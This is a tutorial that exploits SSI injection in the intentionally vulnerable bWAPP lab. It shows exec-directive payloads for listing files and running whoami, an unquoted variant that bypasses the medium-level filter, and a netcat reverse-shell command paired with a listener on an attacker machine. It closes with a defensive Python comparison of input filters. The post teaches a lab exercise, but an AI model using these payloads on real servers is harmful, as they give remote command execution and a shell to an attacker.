Server-Side Includes (SSI) Injection – (bWAPP Level: Low/Medium)

Hello cyberman!

This article covers Server-Side Includes (SSI) injection.

 

What Is The SSI Injection?

Server-Side Includes are directives processed on the server side that feed dynamic content into HTML pages as they are created. SSI injection is the vulnerability that arises when user input reaches such a page and is processed as a directive.

What Kind Of Damage Can This Vulnerability Cause?

It can cause problems such as redirects on the website and commands being run on the server side. Today, this vulnerability is not seen very often.

How Is It Detected?

It can be tested by submitting the characters used by the SSI language in the areas of a page where input is taken and output is shown.
Characters: < ! # = / . " - > and [a-zA-Z0-9]

For example: when the “<!--#exec cmd="ls"-->” command is entered into a website's search field, the output of the command may be displayed on the screen.

How To Exploit This Web Vulnerability?

The bWAPP application will be used to give an example.
bWAPP is a Linux distribution and website that contains various vulnerabilities.

Click to download bWAPP.

Virtual machine setup and bWAPP setup will not be explained in this article.

 

After the installation, the vulnerability is selected as seen in the picture above.

When the desired values are entered into the fields on the screen, the IP address of our computer will be displayed.

As seen in the field above, it gave the IP address of our system.

List of sample topics for SSI Injection:

Now is the time to exploit the vulnerability! Let’s enter the command “<!--#exec cmd="ls"-->” in the name or surname field.

Since the command sent to the server is “ls”, the output will be a listing of the folder the page is in.

As seen in the picture above, the contents of the folder are displayed.
Information theft of this kind is possible.

Now let’s think like a hacker.
In effect, we just entered a command in a terminal. If we can enter commands, then let’s find out which user we are running as on the server computer.
Command to enter: “<!--#exec cmd='whoami' -->”

When we enter the command as above, we will get the following result:

As you can see, our username is “www-data”. Now, let’s open a shell on the server computer.

Command for shell: <!--#exec cmd="nc -nv <attacker_machine_ip_address> 5555 -e /bin/sh" -->

But first, let’s open our Kali Linux machine and find out our IP address.

As seen in the picture above, the IP address of our Kali machine is 192.168.1.8.
Now, a port is needed to open a shell terminal. I will use port “5555”. The name of the software to use for the shell: “NetCat” or “nc” or “ncat” or “telnet”, all the same.

It is very high-quality software. Click for topics and details.

 

The “nc -nlvp 5555” command was entered to open the port on our Kali machine. Now, let’s enter the above command on the website.

As seen in the picture above, the command was entered and the connection came in.

We are now connected to 192.168.1.226, which is the website's address. We are now inside the server system.

Let’s run the command “ls” on the Kali machine.

The result is as seen in the picture above. We can do anything we want, because we are inside the server system.

Let’s Set The Difficulty Level To Medium.

This may vary from page to page, but here, when we enter the same command, it will block us.

To get past this, it is enough to change the double quote character. Removing the (") character is sufficient.

For example: <!--#exec cmd=whoami -->

The result will be like the picture above. The page developer can take various measures.
For example: changing special characters or HTML-encoding the input.
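
As an added example (not part of the original article and not bWAPP's own code), the Python sketch below compares two input filters on the directive forms used above: quote escaping, assumed here as a model of a filter that blocks the quoted form, and HTML encoding. The function names, the page template and the sample list are constructed for illustration.

```python
import html
import re

# Start of an SSI directive as it would appear in a server-parsed page: <!--#name
SSI_DIRECTIVE = re.compile(r"<!--#[a-zA-Z]+")

def quote_escape_filter(value: str) -> str:
    """Assumed model of a quote-only filter: backslash-escape ', " and \\."""
    return re.sub(r"(['\"\\])", r"\\\1", value)

def html_encode_filter(value: str) -> str:
    """Encode HTML metacharacters so '<' and '>' reach the page as entities."""
    return html.escape(value, quote=True)

def contains_ssi_directive(rendered: str) -> bool:
    """True if the rendered text still holds a directive start marker."""
    return SSI_DIRECTIVE.search(rendered) is not None

def render_page(first: str, last: str, input_filter) -> str:
    """Hypothetical template: user input written into a server-parsed page."""
    return "<p>Hello {} {},</p>".format(input_filter(first), input_filter(last))

def audit(payloads, input_filter):
    """Return the inputs whose directive marker survives the given filter."""
    return [p for p in payloads
            if contains_ssi_directive(render_page(p, "x", input_filter))]

# Constructed sample inputs: the directive forms shown in the article plus a benign name.
SAMPLES = [
    '<!--#exec cmd="ls"-->',
    "<!--#exec cmd='whoami' -->",
    "<!--#exec cmd=whoami -->",
    "Alice",
]

if __name__ == "__main__":
    for name, f in (("quote-escape", quote_escape_filter),
                    ("html-encode", html_encode_filter)):
        print(name, "leaves directive markers in:", audit(SAMPLES, f))
```

Quote escaping only alters the quoted argument, so the unquoted form passes through unchanged and the directive marker stays in the page in every case; HTML encoding removes the marker from all of them.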

Have a nice day with lots of informatics 🙂
